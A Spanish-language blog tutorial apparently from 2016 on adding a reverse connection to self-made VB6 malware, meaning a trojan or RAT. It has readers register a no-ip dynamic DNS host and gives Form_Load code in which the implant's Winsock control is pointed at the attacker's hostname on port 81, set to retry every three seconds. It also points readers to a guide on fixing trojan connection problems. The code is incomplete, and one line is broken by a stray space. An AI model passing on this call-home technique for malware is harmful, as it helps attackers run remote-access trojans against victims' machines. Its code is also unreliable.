Enter Search Query:

Aprende a crear una conexión inversa para tu malware en VB6

Aprende a crear una conexión inversa para tu malware en VB6

Introducción:

Hola a todos, en este papers les enseñaré a crear una conexión inversa para que puedan colocarla luego en sus malwares.  El método que les mostrare es muy sencillo y se puede mejorar muchísimo, pero es para que tengan una idea de cómo se usa.

Lo que necesitaremos para este tutorial será tener una cuenta en www.no-ip.com

NO-IP

Una vez registrados, nos logueamos colocando nuestro mail y pass que colocamos. Seguido a esto, veremos un menú como este:

Vamos a Add a Host y únicamente colocamos el hostname que usaremos. El resto lo dejaremos tal cual está.

 

Presionamos en el botón «Create Host y listo».

 

 

Ahora nos descargamos el cliente para conectarnos a nuestra no-ip que su descarga está disponible en esa misma web.

 

 

Una vez descargado, lo instalamos y tendremos algo como lo siguiente:

 

 

Nos logueamos con el user y pass con los cuales nos registramos y veremos la no-ip que nos hemos creado:

 

La activamos y damos en Save:

 

 

Si tenemos las tres tildes en verde, es porque todo está perfecto. Ahora pasaremos a la programación.

 

Implementación en el server

Ahora lo que nos quedaría, seria colocarlo en el server.
Agregamos el control Winsock. Vamos al menú en Proyecto y seleccionamos Componentes
Y añadimos el control Microsoft Winsock Control 6.0 (o la versión más actual).

 

Nos aparecerá un nuevo control con este icono:

9

Simplemente lo arrastramos hacia adentro del formulario:

 

 

Ahora damos doble click sobre el formulario y añadimos el siguiente código:

Private Sub Form_Load()
'Conexion Inversa
Dim ip As String
Dim ipftp As String
Dim port As Integer

ip = "antrax-labs.no-ip.org"
ipftp = "antrax-labs.no-ip.org"
port = 81
WS.RemoteHost = ip
WS.RemotePort = port
tmr_inversa.in terval = "3000"
End Sub

 

Recuerden cambiar IP, IPFTP por su no-ip y el puerto por el que tengan abierto en su router.
Como bien dije al principio, esto se puede mejorar y mucho, ya que en lugar de modificar el código fuente del server manualmente se vuelve tedioso y puede ser reemplazado por un edit server o un build server desde el cliente. Pero eso ya quedara para otro tutorial.

Espero que les sirva y hayan entendido como funciona.

Saludos!

 ANTRAX!

PD: Si tenéis algún problema,  podéis consultar un estupendo aporte de 79137913 en: [TryConnect] La solución definitiva para los problemas de conexión troyano/RAT

Comentarios

Comentarios

28 abril, 2016

Posts Relacionados

0 comentarios

Comentarios en: Aprende a crear una conexión inversa para tu malware en VB6

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *